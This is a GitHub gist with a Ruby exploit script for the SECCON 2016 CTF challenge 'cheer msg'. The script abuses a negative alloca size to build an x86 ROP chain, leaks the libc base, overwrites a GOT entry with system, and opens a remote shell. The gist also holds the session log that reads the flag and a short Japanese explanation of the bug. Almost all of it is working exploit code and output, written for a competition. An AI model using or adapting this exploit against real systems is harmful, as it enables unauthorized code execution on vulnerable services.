Skip to content

Instantly share code, notes, and snippets.

@Charo-IT

Charo-IT/cheer_msg.rb Secret

Created Dec 11, 2016
Embed
What would you like to do?
SECCON 2016 Quals - cheer msg
#coding:ascii-8bit
require "pwnlib" # https://github.com/Charo-IT/pwnlib
remote = ARGV[0] == "r"
if remote
host = "cheermsg.pwn.seccon.jp"
port = 30527
libc_offset = {
"setbuf" => 0x67b20,
"system" => 0x40310
}
else
host = "localhost"
port = 54321
libc_offset = {
"setbuf" => 0x67b20,
"system" => 0x40310
}
end
offset = {
"printf" => 0x08048430,
"__libc_start_main" => 0x08048490,
"getnline" => 0x080486bd,
"pop1ret" => 0x080487af,
"pop2ret" => 0x080487ae
}
got = {
"setbuf" => 0x0804a00c,
"__libc_start_main" => 0x0804a028
}
PwnTube.open(host, port) do |tube|
puts "[*] send rop"
tube.recv_until(">> ")
tube.sendline("-158")
tube.recv_until("Name >> ")
payload = ""
payload << [offset["printf"], offset["pop1ret"], got["setbuf"]].pack("L*")
payload << [offset["getnline"], offset["pop2ret"], got["__libc_start_main"], 8].pack("L*")
payload << [offset["__libc_start_main"], 0xdeadbeef, got["__libc_start_main"] + 4].pack("L*")
tube.sendline(payload)
puts "[*] leak libc base"
tube.recv_until("Message : \n")
libc_base = tube.recv(4).unpack("L")[0] - libc_offset["setbuf"]
tube.recv
puts "libc base = 0x%08x" % libc_base
puts "[*] got overwrite"
payload = ""
payload << [libc_base + libc_offset["system"]].pack("L")
payload << "sh\0"
tube.send(payload)
tube.interactive
end
$ ruby solver.rb r
[*] connected
[*] send rop
[*] leak libc base
libc base = 0xf75b9000
[*] got overwrite
[*] interactive mode
id
uid=10553 gid=1001(cheer_msg) groups=1001(cheer_msg)
ls -la
total 36
drwxr-xr-x 2 root cheer_msg 4096 Dec 5 15:23 .
drwxr-xr-x 4 root root 4096 Dec 5 15:19 ..
-rw-r--r-- 1 root cheer_msg 220 Dec 5 15:19 .bash_logout
-rw-r--r-- 1 root cheer_msg 3637 Dec 5 15:19 .bashrc
-rw-r--r-- 1 root cheer_msg 675 Dec 5 15:19 .profile
-rwxr-xr-x 1 root cheer_msg 7701 Dec 3 17:06 cheer_msg
-rw-r--r-- 1 root cheer_msg 25 Dec 5 00:01 flag.txt
-rwxr-xr-x 1 root cheer_msg 34 Dec 4 23:20 run.sh
cat flag.txt
SECCON{N40.T_15_ju571c3}
exit
[*] end interactive mode
[*] connection closed
@Charo-IT

This comment has been minimized.

Copy link
Owner Author

@Charo-IT Charo-IT commented Dec 11, 2016

allocaに負数を渡すとmainからのリターンアドレス以下が書き換えられるようになる
あとは普通のx86なROP

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment